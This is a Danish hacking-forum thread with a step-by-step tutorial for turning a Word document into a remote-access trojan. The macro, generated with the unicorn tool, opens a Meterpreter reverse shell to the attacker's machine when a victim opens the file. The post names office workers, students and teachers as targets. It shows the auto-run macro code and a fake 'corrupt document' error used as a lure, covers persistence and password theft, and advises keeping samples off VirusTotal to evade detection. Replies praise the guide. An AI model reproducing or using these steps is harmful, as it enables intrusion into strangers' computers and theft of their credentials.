Tråd bedømmelse:
  • 4 Stemmer - 5 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
[TUTORIAL] Word RAT Macro - Powershell
01-03-2017, 21:53 (Denne besked var sidst ændret: 02-03-2017, 17:59 af TheHacker. Årsag: Rettelse af diverse ting )
#1
[TUTORIAL] Word RAT Macro - Powershell
Hehe... Så kom der en lille sjov tutorial...

Beskrivelse:
I den følgende Tutorial vil du komme til at arbejde med Word Macros (RATs).
Denne metode vil give dig fuld adgang til ofrets computer.
Den måde denne exploit fungere på er, at når en person åbner Word-filen du har sendt, så vil ofrets computer automatisk køre din fil.
Denne metode er 95% FUD. Der er nogle få, der opdager denne RAT, men de færreste.
Word dokumentet lukker med en fejl besked "The document appears to be made on an older version of Microsoft.
Please have the creator save to a newer and supported format.", når det bliver åbnet. Dette kan dog laves om, hvis du vil.


[Billede: lpAJQ4aZhRC1cWrd9EeFDOq.png]



Hvad du skal bruge:
  • Word 2016 (kan crackes, lidt ligegyldigt) eller hvilket som helst Microsoft Dokument fil
  • Kali Linux (hvis det er vmware/virtuelbox, så skal den være bridged)
  • Metasploit basic viden
  • Hjerne
  • Viden
Hvem er dette attack målrettet i mod?:
  • Hovedsageligt kontor brugere, elever, skoler, lærere
  • Word brugere
Download links: Tutorial:
  1. Tænd din kali linux
  2. Skriv apt-get install git, dette vil installere git, som bla. kan bruges til at hente github repositories
  3. Skriv apt-get install python, for at installere python
  4. Herefter skal du hente unicorn, det gør du ved at skrive git clone https://github.com/trustedsec/unicorn.git
  5. Nu skal vi ind hvor unicorn er blevet hentet. Det gør du ved at skrive cd unicorn
  6. Nu kan du skrive python unicorn.py ved, at skrive dette kan du, se hvad du kan bruge scriptet til.
  7. Du skal nu finde din IP på sider som whatismyipcanyouseeme og eller hvilken som helst anden. Søg blot efter "find my ip" på google.
    Jeg anbefaler dog canyouseeme, da vi kommer til at bruge den senere.
    Nu skal du sørge for at din port er portforwarded (håber jeg, du ved hvordan)
  8. Skriv nu python unicorn.py windows/meterpreter/reverse_tcp <din ip> <din valgte port> macro
    Du kan nok genkende windows/meterpreter/reverse_tcp fra metasploit.
  9. Nu opretter den en fil "powershell_attack.txt" her i ligger din macro kode. Den kommer vi til at bruge senere.
  10. Du kan se, du kan bruge msfconsole -r unicorn.rc for at den automatisk kører din payload i metasploit, dog skal vi lige ændre noget.
    Skriv leafpad unicorn.rc og ændre LHOST til din inet adresse. Denne kan findes ved at skrive ifconfig i terminalen.
    Grunden til, at vi gør det, er så vi kan listen scriptet på din computer. Du kan ikke bruge den optimalt, hvis du ikke ændre det,
    fordi den forsøger at forbinde til din ip, i stedet for din inet adresse.
    Jeg har lige opdaget, at den nye version af unicorn har en fejl, der gør, at du også skal ændre LPORT.
    LPORT skal ændres til den port, du har portforwarded.
  11. Åben nu word på din egen computer og opret et dokument,
  12. Kopier indeholdet fra powershell_attack.txt (leafpad powershell_attack.txt)
  13. Gå nu ind til dit word dokument igen og tryk under Makroer i: "Dokument (dokument)"--> Herefter Vis --> Makroer --> Opret --> Under Project (Dok1) vælger du "ThisDocument" --> sæt herefter hele powershell scriptet ind.
  14. Ændre

    Citer: Sub Auto_Open()
    Dim gEmssmj

    til AutoOpen, det vil sige uden _
  15. Herefter ændre i det, som du vil. Du kan f.eks. fjerne
    Citer:Dim title As String
    title = "Microsoft Corrupt Document"
    Dim msg As String
    Dim intResponse As Integer
    msg = "The document appears to be made on an older version of Microsoft.
    Please have the creator save to a newer and supported format."
    intResponse = MsgBox(msg, 16, title)
    Application.Quit
     
    fra scriptet for at undgå den lukker. Du kan også ændre teksten af fejlbeskeden, hvis du vil.
  16. Nu kan du vælge at skrive noget i word dokumentet, hvis du vil.
  17. Vi skal nu gemme word dokumentet (på en speciel måde), gå ind under Filer --> Gem som -->  Gennemse (og vælg, hvor du vil gemme den) --> Under filtype vælger du "Word 97 - 2003-dokumenter (*.doc)"´
  18. Tryk nu gem
  19. Gå tilbage til din kali linux og kør msfconsole -r unicorn.rc og vent på at den er færdig, hvor der står (
  20. Starting the payload handler...).
  21. Prøv nu at åbne dokumentet på din computer (det er sikkert, bare rolig) og se om du kan se noget i din terminal. Hvis du har gjort alt rigtigt, skal der gerne stå (Meterpreter session 1 opened )
  22. Nu kan du vælge Sessionen ved, at skrive sessions, nu kan du se en liste over alle dine ofre (i dette tilfælde, dig). Vælg din session, ved at skrive sessions -i 1, så vil du automatisk blive connected til den valgte session.
  23. Skriv nu help for, at se hvad du kan (generelle metasploit ting)
  24. Hvis du vil have den til at starte op med computeren, så vil nogle antivirus (ret mange), opdage det. Du kan dog prøve ved at skrive run persistence
Du kan også finde ofrets gemte kodeord i ting så som, steam, skype, browsers, etc. Det kan være jeg vil lave en tutorial om det.



Er der noget jeg kan gøre bedre, vil jeg også meget gerne vide det - har du brug for hjælp til noget, eller har du nogle spørgsmål, så er du velkommen til at poste det i kommentar.
Lad for gudsskyld være med at bruge virustotal... Vi vil jo gerne holde den undetected... :)

Jeg valgte at lave denne tutorial, fordi jeg tænke den kunne være sjov og effektiv - desuden er den ikke set, så meget (førhen var den meget populær), men nu kan den også bruges i Word 2016, hvor det førhen var de ældre versioner.

 - TheHacker, ude Love
Kontakt mig, hvis du har brug for hjælp til noget! Wink
Find alle beskeder fra denne bruger
Citer denne besked i et svar
01-03-2017, 22:14
#2
RE: Microsoft Word Macro - Powershell
Fin lille tutorial

Godt beskrevet, ikke bare sådan nogle tutorials hvor du følger en guide, og så er det det..
Ved din lille tutorial beskriver du tingene, så man kan forstå hvad der foregår

Keep up the good work!

5 stjerner og +rep fra mi! (Hvis man kunne rep)
Find alle beskeder fra denne bruger
Citer denne besked i et svar
01-03-2017, 22:28
#3
RE: Microsoft Word Macro - Powershell
Regl nr. 6 - Omdømme/reputation må ikke købes, sælges, byttes eller efterspørges :)
[Billede: rGvl8UM.png]
Find alle beskeder fra denne bruger
Citer denne besked i et svar
01-03-2017, 22:29
#4
RE: Microsoft Word Macro - Powershell
(01-03-2017, 22:28)Cronick Skrev: Regl nr. 6 - Omdømme/reputation må ikke købes, sælges, byttes eller efterspørges :)

Jamen du har da helt ret det kan jeg også godt se Cronick :)
https://www.shellsec.pw/misc.php?action=help&hid=8
Find alle beskeder fra denne bruger
Citer denne besked i et svar
01-03-2017, 22:38
#5
RE: Microsoft Word Macro - Powershell
(01-03-2017, 22:28)Cronick Skrev: Regl nr. 6 - Omdømme/reputation må ikke købes, sælges, byttes eller efterspørges :)

Jeg ved at reglen er sådan, men jeg ved ikke om jeg direkte bryder den.
Jeg forstår den på den måde, at hvis en person skriver "Hey! Gå lige ind og rep mig! Takker", så er det en efterspørgsel. Jeg mener ikke det er det jeg gør.
Hvis en admin eller moderator, lige ser min kommentar, så skriv det gerne til mig, så jeg kan få det rettet!

Takker på forhånd!
Kontakt mig, hvis du har brug for hjælp til noget! Wink
Find alle beskeder fra denne bruger
Citer denne besked i et svar
01-03-2017, 23:05
#6
RE: Microsoft Word Macro - Powershell
Som udgangspunkt, en fin lille tuttelut.
Det ser nu lidt for spøjst ud at skrive 'the target' og 'victimets' i en dansk sætning. Det gør vi vel alle sammen, men når du man kan skrive 'målet' og 'offerets', så synes jeg nu det lyder bedre.
(23-10-2015, 21:59)bestworks Skrev: Hope you are best customer and we can to work a long time business
Find alle beskeder fra denne bruger
Citer denne besked i et svar
01-03-2017, 23:15 (Denne besked var sidst ændret: 01-03-2017, 23:21 af TheHacker.)
#7
RE: Microsoft Word Macro - Powershell
(01-03-2017, 23:05)MalcolmXI Skrev: Som udgangspunkt, en fin lille tuttelut.
Det ser nu lidt for spøjst ud at skrive 'the target' og 'victimets' i en dansk sætning. Det gør vi vel alle sammen, men når du man kan skrive 'målet' og 'offerets', så synes jeg nu det lyder bedre.

Det glemte jeg helt at skrive i mit opslag!
Jeg var så irriteret over at jeg ikke kunne finde et replacement for "target" og "victim", blev nød til at "halvdanske" det... 
Tak! Love Love

(01-03-2017, 23:05)MalcolmXI Skrev: Som udgangspunkt, en fin lille tuttelut.
Det ser nu lidt for spøjst ud at skrive 'the target' og 'victimets' i en dansk sætning. Det gør vi vel alle sammen, men når du man kan skrive 'målet' og 'offerets', så synes jeg nu det lyder bedre.

Rettet! :)
Kontakt mig, hvis du har brug for hjælp til noget! Wink
Find alle beskeder fra denne bruger
Citer denne besked i et svar
02-03-2017, 07:36
#8
RE: Microsoft Word Macro - Powershell
(01-03-2017, 22:38)TheHacker Skrev: Jeg ved at reglen er sådan, men jeg ved ikke om jeg direkte bryder den.
Jeg forstår den på den måde, at hvis en person skriver "Hey! Gå lige ind og rep mig! Takker", så er det en efterspørgsel. Jeg mener ikke det er det jeg gør.
Hvis en admin eller moderator, lige ser min kommentar, så skriv det gerne til mig, så jeg kan få det rettet!

Takker på forhånd!

Det er imod reglerne Smile

Fin lille tutorial!
yolo
Find alle beskeder fra denne bruger
Citer denne besked i et svar
02-03-2017, 08:20
#9
RE: Microsoft Word Macro - Powershell
(02-03-2017, 07:36)Ash Skrev: Det er imod reglerne Smile

Fin lille tutorial!
Ændret
Kontakt mig, hvis du har brug for hjælp til noget! Wink
Find alle beskeder fra denne bruger
Citer denne besked i et svar
02-03-2017, 15:12
#10
RE: Microsoft Word Macro - Powershell
Lige et hurtigt spg, er denne tutorial til windows/linux eller mac computere?
Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)